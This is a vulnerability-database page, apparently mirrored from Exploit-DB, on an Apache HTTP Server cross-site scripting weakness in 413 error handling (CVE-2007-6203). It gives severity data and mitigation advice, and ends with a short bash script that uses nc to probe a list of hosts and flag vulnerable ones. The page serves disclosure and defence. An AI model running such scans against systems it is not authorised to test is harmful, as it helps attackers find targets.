Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Apache Cross-Site Scripting Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
Unknown
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Apache HTTP Server
Affected Version From: 2.0.46
Affected Version To: 2.2.2004
Patch Exists: YES
Related CWE: CVE-2007-6203
CPE: a:apache:http_server:2.0.46
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2007-6203/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-6203/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2007-6203/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2007-6203/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-6203/
Other Scripts:
Platforms Tested:
2007

Apache Cross-Site Scripting Vulnerability

Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors. An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Apply the necessary patches or updates provided by the Apache Foundation. Additionally, implement input validation and output encoding to prevent cross-site scripting vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26663/info

Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected. 

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
       echo "$0 <hosts-file>"
       exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: 
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep 
-i '<PROCHECKUP>' > /dev/null
then
       echo "$i is VULNERABLE!"
fi

done

Navigation

Suggest Exploit

Services By CQR